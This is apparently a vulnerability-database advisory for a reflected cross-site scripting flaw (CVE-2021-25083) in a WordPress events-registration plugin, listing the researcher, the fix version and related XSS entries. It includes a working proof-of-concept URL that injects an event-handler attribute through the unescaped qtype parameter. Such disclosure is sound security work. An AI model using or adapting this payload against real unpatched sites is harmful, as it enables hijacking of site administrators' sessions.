Registrations for the Events Calendar < 2.7.10 – Reflected Cross-Site Scripting | CVE 2021-25083 | Plugin Vulnerabilities

Description

The plugin does not escape the qtype parameter before outputting it back in an attribute in the settings page, leading to a Reflected Cross-Site Scripting

Proof of Concept

http://example.com/wp-admin/admin.php?page=registrations-for-the-events-calendar&qtype=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28/XSS/%29+p%3D

Affects Plugins

registrations-for-the-events-calendar

Fixed in 2.7.10

References

CVE

URL

https://plugins.trac.wordpress.org/changeset/2648377

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Krzysztof Zając

Submitter

Krzysztof Zając

Submitter website

https://kazet.cc/

Verified

Yes

WPVDB ID

9b69544d-6a08-4757-901b-6ccf1cd00ecc

Timeline

Publicly Published

2021-12-27 (about 4 years ago)

Added

2021-12-27 (about 4 years ago)

Last Updated

2022-04-09 (about 3 years ago)

Other

Published

Title

Published

2022-01-12

Title

Remove Footer Credit < 1.0.11 - Admin+ Stored Cross-Site Scripting

Published

2022-02-17

Title

Profile Builder < 3.6.2 - Reflected Cross-Site Scripting

Published

2026-01-13

Title

SpiceForms Form Builder <= 1.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode

Published

2025-02-28

Title

Page Builder by SiteOrigin < 2.31.5 - Contributor+ Stored XSS

Published

2025-01-29

Title

EthereumICO < 2.4.7 - Authenticated (Contributor+) Stored Cross-Site Scripting via ethereum-ico Shortcode